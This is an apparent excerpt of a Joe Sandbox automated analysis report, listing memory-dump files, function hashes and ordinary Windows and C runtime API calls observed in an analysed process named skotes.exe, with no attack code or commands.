Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 7990114625ea434e598ba75ec872e28a4bfd44d53151be56f9c5776a23487246
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: B8E08C3292122CEBCB14DB98EA0498AF3ECEB49B00B650096F512D3190C270DE00CBD1

Function 009D2EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 009D2F5F
__Mtx_unlock.LIBCPMT ref: 009D2FCC
__Cnd_broadcast.LIBCPMT ref: 009D2FE3
__Mtx_unlock.LIBCPMT ref: 009D30F5
__Mtx_unlock.LIBCPMT ref: 009D319B

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: aaeb2ecd1f3921bdbf725b527bb4b50f020e603a35153608321ad392b7f4f219
Instruction ID: 8e8858656a8179b95cccdfcac2b5239f84e7007bf66fe60e426a883a20da9d65
Opcode Fuzzy Hash: aaeb2ecd1f3921bdbf725b527bb4b50f020e603a35153608321ad392b7f4f219
Instruction Fuzzy Hash: 5AA11FB0A45246AFDB21DFA5C84479AB7B8FF55311F00C62AE815D7381EB31EA05CBD2

Function 00A0CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00A0CC66

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction ID: 124469340639c694326a8b39252ebb809217ad669817e19aac9aaabbd3da025b
Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction Fuzzy Hash: 4DB14632D002499FEB11CF28D8917EEBBF5EF55360F14426AE855EB2C2D6388D42CB60

Function 009EBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 009EBBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 009EBBE4
_xtime_get.LIBCPMT ref: 009EBC07
__Xtime_diff_to_millis2.LIBCPMT ref: 009EBC13

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: a3da72e5dff52e3a4e9ffaececd4f4d5a91f3933fb772cc2eba7dc4b71bd4b88
Instruction ID: 19c3b3b8a110a30b0d9baebd642033a8cc80a48971328818fabd6a5b8ab78593
Opcode Fuzzy Hash: a3da72e5dff52e3a4e9ffaececd4f4d5a91f3933fb772cc2eba7dc4b71bd4b88
Instruction Fuzzy Hash: 512133B5900159AFDF01EFA5DC85ABFB779EF48710F110425F941B7251DB34AD029B90

Analysis Process: skotes.exePID: 5324, Parent PID: 3832COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1886
Total number of Limit Nodes:	9

Executed Functions

Function 0093652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0093652A,?,?,?,?,?,00937661), ref: 00936566

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 80f93c76bb87cc4ff56d97b6174f82fecb4ba7f943d756bf2249a894a59aae31
Instruction ID: 8ab404b7ec460d65cc1894c48a597f8f75eccee157553ff3afb6155f9c5e1ba8
Opcode Fuzzy Hash: 80f93c76bb87cc4ff56d97b6174f82fecb4ba7f943d756bf2249a894a59aae31
Instruction Fuzzy Hash: 64E0EC30042148BACE26BB59C905A583B6AEB92755F009824F9058A635CB65ED92EE80

Function 00909BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
